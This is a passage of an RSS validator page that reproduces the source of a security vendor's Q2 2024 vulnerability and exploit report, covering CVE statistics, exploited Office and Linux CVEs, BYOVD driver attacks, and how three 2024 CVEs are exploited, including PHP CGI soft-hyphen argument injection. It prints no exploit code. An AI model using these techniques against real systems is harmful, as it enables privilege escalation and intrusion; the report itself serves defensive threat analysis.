  3641. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of vulnerabilities and the share of critical ones and of those for which exploits exist, 2019–2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20190446/02-en-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p>
  3642. <p>The chart also shows the share among all registered vulnerabilities of ones that are critical and of ones for which there is a public description or Proof of Concept. The drop in the latter&#8217;s share in Q2 illustrates that the number of registered vulnerabilities is growing faster than the number of published exploits for them.</p>
  3643. <p>The share of critical vulnerabilities also decreased slightly relative to 2023. But it is critical vulnerabilities that pose the greatest risk. To understand the risks that organizations may face, and how these risks change over time, let&#8217;s look at the types of vulnerabilities that make up the total number of critical CVEs registered in Q2 2023 and Q2 2024.</p>
  3644. <div class="js-infogram-embed" data-id="_/9SZJGmGIxaQKVaJ24ArG" data-type="interactive" data-title="03 EN Exploit report data" style="min-height:;"></div>
  3645. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Vulnerability types that critical CVEs registered in Q2 2023 fall under (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20155618/03-en-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p>
  3646. <div class="js-infogram-embed" data-id="_/VSvIqeGpgFUWwtgp4tne" data-type="interactive" data-title="04 EN Exploit report data" style="min-height:;"></div>
  3647. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Vulnerability types that critical CVEs registered in Q2 2024 fall under (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20161253/04-en-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p>
  3648. <p>As we see from the charts, even with a CVE entry, most issues remain unclassified and require further investigation to obtain details, which can seriously hamper efforts to protect systems where these vulnerabilities may arise. Besides unclassified critical vulnerabilities, other common issues in Q2 2023 were:</p>
  3649. <ul>
  3650. <li><a href="https://cwe.mitre.org/data/definitions/89.html" target="_blank" rel="noopener"><em>CWE</em>-89</a><em>: Improper Neutralization of Special Elements used in an SQL Command (SQL Injection)</em></li>
  3651. <li><a href="https://cwe.mitre.org/data/definitions/78.html" target="_blank" rel="noopener"><em>CWE</em>-78</a><em>: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection)</em></li>
  3652. <li><a href="https://cwe.mitre.org/data/definitions/74.html" target="_blank" rel="noopener">CWE-74</a><em>: Improper Neutralization of Special Elements in Output Used by a Downstream Component (Injection)</em></li>
  3653. </ul>
  3654. <p>Other types of vulnerabilities came to the fore in Q2 2024:</p>
  3655. <ul>
  3656. <li><a href="https://cwe.mitre.org/data/definitions/434.html" target="_blank" rel="noopener"><em>CWE</em>-434</a><em>: Unrestricted Upload of File with Dangerous Type</em></li>
  3657. <li><a href="https://cwe.mitre.org/data/definitions/89.html" target="_blank" rel="noopener"><em>CWE</em>-89</a><em>: Improper Neutralization of Special Elements used in an SQL Command (SQL Injection)</em></li>
  3658. <li><a href="https://cwe.mitre.org/data/definitions/89.html" target="_blank" rel="noopener">CWE-22</a><em>: Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)</em></li>
  3659. </ul>
  3660. <p>Both lists of the most common types indicate that the vast majority of classified critical vulnerabilities get registered for web applications. According to open-source information, vulnerabilities in web applications are indeed the most critical, since web applications include software that can access sensitive data, such as file-sharing systems, consoles controlling VPN access and cloud and IoT systems.</p>
  3661. <h2 id="vulnerability-exploitation-statistics">Vulnerability exploitation statistics</h2>
  3662. <p>This section presents exploit statistics for Q2 2024 obtained from open sources and our in-house telemetry.</p>
  3663. <p>Exploits are quite expensive software. Their shelf life can be counted in days, even hours. Conversely, creating them is a lengthy process, which varies depending on the type of exploit. Below are statistics on the most popular platforms where users were attacked with exploits.</p>
  3664. <h3 id="windows-and-linux-vulnerability-exploitation">Windows and Linux vulnerability exploitation</h3>
  3665. <p>Since the start of the year, we have seen growth in the number of triggerings of Kaspersky solutions by exploits for Windows, driven primarily by phishing emails and attempts to gain initial access to user systems through vulnerability exploitation. Among the most popular are exploits for vulnerabilities in the Microsoft Office suite:</p>
  3666. <ul>
  3667. <li>CVE-2018-0802 – remote code execution vulnerability in the Equation Editor component</li>
  3668. <li>CVE-2017-11882 – another remote code execution vulnerability in Equation Editor</li>
  3669. <li>CVE-2017-0199 – remote code execution vulnerability in Microsoft Office and WordPad</li>
  3670. <li>CVE-2021-40444 – remote code execution vulnerability in the MSHTML component</li>
  3671. </ul>
  3672. <div class="js-infogram-embed" data-id="_/IhuSdNuyT6j6zUGGVepf" data-type="interactive" data-title="05 EN Exploit report data" style="min-height:;"></div>
  3673. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Dynamics of the number of Windows users who encountered exploits, Q1 2023 — Q2 2024. The number of users who encountered exploits in Q1 2023 is taken as 100% (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20162442/05-en-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p>
  3674. <p>Note that due to similar detection patterns, exploits classified as CVE-2018-0802 and CVE-2021-40444 may include ones for the vulnerabilities CVE-2022-30190 (remote code execution in the Microsoft Support Diagnostic Tool (MSDT)) and CVE-2023-36884 (remote code execution in the Windows Search component), which also remain a live threat.</p>
  3675. <p>As Linux grows in the corporate segment, it also shows growth in terms of exploits; in contrast to Windows, however, the main exploits for Linux target the kernel:</p>
  3676. <ul>
  3677. <li>CVE-2022-0847 – privilege escalation vulnerability in the Linux kernel</li>
  3678. <li>CVE-2023-2640 – privilege escalation vulnerability in the Ubuntu kernel</li>
  3679. <li>CVE-2021-4034 – privilege escalation vulnerability in the pkexec utility used to execute commands as another user</li>
  3680. </ul>
  3681. <div class="js-infogram-embed" data-id="_/ZoA7YiwrmPR43G3nilmk" data-type="interactive" data-title="06 EN Exploit report data" style="min-height:;"></div>
  3682. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Dynamics of the number of Linux users who encountered exploits in Q1 2023 — Q2 2024. The number of users who encountered exploits in Q1 2023 is taken as 100% (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20162529/06-en-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p>
  3683. <p>Most exploits for Linux pertain to privilege escalation and can be used to gain persistence and run malicious code in the system. This may be because attackers often target Linux servers for which high privileges are needed to gain control.</p>
  3684. <h3 id="most-common-exploits">Most common exploits</h3>
  3685. <p>Q2 saw a shift in the distribution of critical vulnerabilities for which there are public exploits. See the charts below for a visual comparison of Q1 and Q2.</p>
  3686. <div class="js-infogram-embed" data-id="_/4ymWFhxL5jeMwAhsFu4x" data-type="interactive" data-title="07 EN Exploit report data" style="min-height:;"></div>
  3687. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of exploits for critical vulnerabilities by platform, Q1 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20162607/07-en-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p>
  3688. <div class="js-infogram-embed" data-id="_/NnCnWRUmnX7tPXGzx9p7" data-type="interactive" data-title="08 EN Exploit report data" style="min-height:;"></div>
  3689. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of exploits for critical vulnerabilities by platform, Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20190856/08-en-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p>
  3690. <p>The share of exploits for vulnerabilities in operating systems increased in Q2 against Q1. This is because researchers tend to publish PoCs ahead of the summer season of cybersecurity conferences. Consequently, a great many OS exploits were published in Q2. In addition, the share of exploits for vulnerabilities in Microsoft Sharepoint increased during the reporting period, with almost no new exploits for browsers.</p>
  3691. <h2 id="vulnerability-exploitation-in-apt-attacks">Vulnerability exploitation in APT attacks</h2>
  3692. <p>We analyzed which vulnerabilities are most often used in advanced persistent threats (APTs). The ranking below is based on our telemetry, research and open sources.</p>
  3693. <div id="attachment_113481" style="width: 810px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21073427/09-en-exploit-report-data.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113481" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21073427/09-en-exploit-report-data.png" alt="Top 10 vulnerabilities exploited in APT attacks, Q2 2024" width="800" height="743" class="size-full wp-image-113481" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21073427/09-en-exploit-report-data.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21073427/09-en-exploit-report-data-300x279.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21073427/09-en-exploit-report-data-768x713.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21073427/09-en-exploit-report-data-377x350.png 377w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21073427/09-en-exploit-report-data-740x687.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21073427/09-en-exploit-report-data-301x280.png 301w" sizes="(max-width: 800px) 100vw, 800px" /></a><p id="caption-attachment-113481" class="wp-caption-text">Top 10 vulnerabilities exploited in APT attacks, Q2 2024</p></div>
  3694. <p>Although the list of vulnerabilities common in APT attacks is radically different compared to <a href="https://securelist.com/vulnerability-report-q1-2024/112554/#vulnerability-exploitation-in-apt-attacks" target="_blank" rel="noopener">Q1</a>, attackers most often exploited the same types of software/hardware solutions to gain access to organizations&#8217; internal networks: remote access services, access control mechanisms and office applications. Note that the vulnerabilities of 2024 in this ranking were already being exploited at the time of discovery, that is, they were zero-day vulnerabilities.</p>
  3695. <h2 id="exploiting-vulnerable-drivers-to-attack-operating-systems">Exploiting vulnerable drivers to attack operating systems</h2>
  3696. <p>This section examines public exploits that use vulnerable drivers to attack the Windows operating system and software for it. According to open sources and our own data, there are hundreds of such vulnerable drivers, and new ones are appearing all the time.</p>
  3697. <p>Threat actors use vulnerable drivers as part of the Bring You Own Vulnerable Driver (BYOVD) technique. This involves installing an unpatched driver on the targeted system to ensure the vulnerability is exploited for privilege escalation in the OS or other cybercriminal activity. This method was first used by creators of game cheats, but was later adopted by cybercriminals.</p>
  3698. <p>Since 2023, we have noticed an upward trend in the use of vulnerable drivers to attack Windows with a view to escalating privileges and bypassing security mechanisms. In response, we are systematically adding and improving the mechanisms for detecting and blocking malicious operations through vulnerable drivers in our solutions.</p>
  3699. <h3 id="byovd-attack-tools">BYOVD attack tools</h3>
  3700. <p>Vulnerable drivers themselves are a serious enough problem for OS security, but truly destructive activity requires a client application to pass malicious instructions to the driver.</p>
  3701. <p>Since 2021, we have seen the appearance of 24 online tools for controlling vulnerable drivers in the context of privilege escalation and attacks on privileged processes, such as built-in and third-party security solutions. See below for a year-by-year distribution.</p>
  3702. <div class="js-infogram-embed" data-id="_/to68Td76yrFh5stPs5H7" data-type="interactive" data-title="10 EN-RU-ES Exploit report data" style="min-height:;"></div>
  3703. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of tools published online for controlling vulnerable drivers, 2021–2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20162713/10-en-ru-es-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p>
  3704. <p>As we can see, 2023 was the most abundant year for BYOVD attack tools. And more were published in H1 2024 than in 2021 and 2022 combined. We evaluated the trends of using such software in real attacks, as illustrated by blocked attacks on Kaspersky products in Q1 and Q2 2024:</p>
  3705. <div class="js-infogram-embed" data-id="_/DA5nJnRxqwNrdAGvg07R" data-type="interactive" data-title="11 EN Exploit report data" style="min-height:;"></div>
  3706. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Dynamics of the number of users who encountered attacks using vulnerable drivers on Kaspersky products, Q1 and Q2 2024; data for Q1 2024 is taken as 100% (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20162754/11-en-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p>
  3707. <p>With the rise in the number of BYOVD attacks, developers of tools exploiting vulnerable drivers began to sell them, so we see a downturn in the number of published tools for attacks using vulnerable drivers. However, as mentioned, they continue to be made publicly available.</p>
  3708. <h2 id="interesting-vulnerabilities">Interesting vulnerabilities</h2>
  3709. <p>This section presents information about vulnerabilities of interest that were registered in Q2 2024.</p>
  3710. <h2 id="cve-2024-26169-werkernel-sys">CVE-2024-26169 (WerKernel.sys)</h2>
  3711. <p>Werkernel.sys is a driver for the Windows Error Reporting (WER) subsystem, which handles the sending of error messages. <a href="https://www.cve.org/CVERecord?id=CVE-2024-26169" target="_blank" rel="noopener">CVE-2024-26169</a> is a zero-day vulnerability discovered during the investigation of an incident related to a ransomware attack. It is caused by werkernel.sys using the null security descriptor, which handles the access level. This allows any user to interact with the driver, for example, to rewrite the value of the registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WerFault.exe. This key stores data about the application that is responsible for error handling for applications in Windows.</p>
  3712. <p>An examination of the exploitation algorithm reveals the following events:</p>
  3713. <div id="attachment_113465" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113465" class="size-large wp-image-113465" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01-1024x562.png" alt="List of events generated by the exploit " width="1024" height="562" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01-1024x562.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01-300x165.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01-768x421.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01-638x350.png 638w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01-740x406.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01-511x280.png 511w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01-800x439.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01.png 1331w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113465" class="wp-caption-text">List of events generated by the exploit</p></div>
  3714. <p>The exploit tries to perform preparatory actions to create special registry keys that allow the executable file specified in the registry to be restarted with SYSTEM user privileges. The exploit itself is based on a race condition vulnerability, so its success depends on the system where it is launched.</p>
  3715. <h2 id="cve-2024-26229-csc-sys">CVE-2024-26229 (csc.sys)</h2>
  3716. <p>Csc.sys is another driver in Windows, this time related to the Windows Client-Side Caching (CSC) service, which handles data caching on the client side. <a href="https://www.cve.org/CVERecord?id=CVE-2024-26229" target="_blank" rel="noopener">CVE-2024-26229</a> is a privilege escalation vulnerability, one that clearly illustrates the problem of insecure code in operating system drivers. Just a few days after the information about this vulnerability was <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26229" target="_blank" rel="noopener">posted on the Microsoft portal</a>, a PoC was released that spread online and was rewritten for various formats and frameworks for penetration testing.</p>
  3717. <p>The exploit is very easy to use and comprises a &#8220;classic&#8221; combination of the Write primitive (writing to an arbitrary kernel location) and the kernel object address leak primitive.</p>
  3718. <p>The vulnerability is triggered using IOCTL, meaning that the method of communication with the vulnerable driver is in many ways similar to the BYOVD attack method.</p>
  3719. <p>The main algorithm of the exploit aims to modify the PRIMARY_TOKEN structure of the user-run process. This is achieved through the capabilities of the vulnerable driver.</p>
  3720. <h2 id="cve-2024-4577-php-cgi">CVE-2024-4577 (PHP CGI)</h2>
  3721. <p><a href="https://www.cve.org/CVERecord?id=CVE-2024-4577" target="_blank" rel="noopener">CVE-2024-4577</a> stems from bypassing the validation of parameters passed to the web application. Essentially, the vulnerability exists because PHP in CGI mode may not fully validate dangerous characters for pages in some languages. Cybercriminals can use this feature to carry out a standard OS command injection attack.</p>
  3722. <p>The validation problem arises in systems using the following language settings:</p>
  3723. <ul>
  3724. <li>Traditional Chinese (code page 950)</li>
  3725. <li>Simplified Chinese (code page 936)</li>
  3726. <li>Japanese (code page 932)</li>
  3727. </ul>
  3728. <p>Note that CGI mode is not very popular today, but can be found in products such as XAMPP web servers.</p>
  3729. <p>Exploitation of the vulnerability is made possible by the fact that to bypass the filter parameter, it is enough to replace a normal dash with the equivalent of the Unicode symbol &#8220;–&#8221; (soft hyphen) in writing systems based on Chinese characters. As a result, the query is supplemented with data that can run additional commands. In the process tree, the full exploitation will look as follows:</p>
  3730. <div id="attachment_113466" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153144/vulnerability_exploit_report_q2_2024_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113466" class="size-large wp-image-113466" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153144/vulnerability_exploit_report_q2_2024_02-1024x107.png" alt="Tree of processes in the victim system during exploitation of CVE-2024-4577" width="1024" height="107" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153144/vulnerability_exploit_report_q2_2024_02-1024x107.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153144/vulnerability_exploit_report_q2_2024_02-300x31.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153144/vulnerability_exploit_report_q2_2024_02-768x80.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153144/vulnerability_exploit_report_q2_2024_02-740x77.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153144/vulnerability_exploit_report_q2_2024_02-800x84.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153144/vulnerability_exploit_report_q2_2024_02.png 1350w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113466" class="wp-caption-text">Tree of processes in the victim system during exploitation of CVE-2024-4577</p></div>
  3731. <h2 id="takeaways-and-recommendations">Takeaways and recommendations</h2>
  3732. <p>In terms of quality and quantity, vulnerabilities and working exploits for them continue to grow each quarter, and threat actors are finding ways to bring already patched vulnerabilities back to life. One of the main tricks for exploiting closed vulnerabilities is the BYOVD technique, whereby attackers load a vulnerable driver into the system themselves. The wide variety of examples and toolkits in the public domain allow cybercriminals to quickly adapt vulnerable drivers to their needs. Going forward, we will likely only see more active use of this technique in attacks.</p>
  3733. <p>To stay safe, you need to react promptly to the changing threatscape, as well as:</p>
  3734. <ul>
  3735. <li>Understand and monitor your infrastructure thoroughly, paying particular attention to the perimeter; knowing your way around your own infrastructure is vital to keeping it secure.</li>
  3736. <li>Introduce effective patch management to promptly detect and eliminate infrastructure vulnerabilities, including vulnerable drivers slipped into your network by attackers. Our <a href="https://www.kaspersky.com/small-to-medium-business-security/systems-management" target="_blank" rel="noopener">Vulnerability Assessment and Patch Management</a> and <a href="https://www.kaspersky.com/vuln-feed?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d4b451acf916e1c8" target="_blank" rel="noopener">Kaspersky Vulnerability Data Feed</a> solutions could help you with this.</li>
  3737. <li>Use comprehensive security solutions that deliver robust protection of workstations, as well as early detection and prevention of attacks of any complexity, collection of live cyberattack data from around the globe, and basic digital literacy skills for employees. Our <a href="https://www.kaspersky.com/next?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___knext____7a48716a2c69383d" target="_blank" rel="noopener">Kaspersky NEXT</a> line of solutions ticks all these boxes and more.</li>
  3738. </ul>
  3739. ]]></content:encoded>
  3740. <wfw:commentRss>https://securelist.com/vulnerability-exploit-report-q2-2024/113455/feed/</wfw:commentRss>
  3741. <slash:comments>0</slash:comments>
  3742. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21072724/SL-vulnerability-exploit-report-featured.jpg" width="1376" height="864"><media:keywords>full</media:keywords></media:content>
  3743. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21072724/SL-vulnerability-exploit-report-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
  3744. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21072724/SL-vulnerability-exploit-report-featured-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content>
  3745. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21072724/SL-vulnerability-exploit-report-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  3746. </item>
  3747. </channel>
  3748. </rss>
  3749.  

If you would like to create a banner that links to this page (i.e. this validation result), do the following:

  1. Download the "valid RSS" banner.

  2. Upload the image to your own server. (This step is important. Please do not link directly to the image on this server.)

  3. Add this HTML to your page (change the image src attribute if necessary):

If you would like to create a text link instead, here is the URL you can use:

http://www.feedvalidator.org/check.cgi?url=http%3A//securelist.com/feed/

Copyright © 2002-9 Sam Ruby, Mark Pilgrim, Joseph Walton, and Phil Ringnalda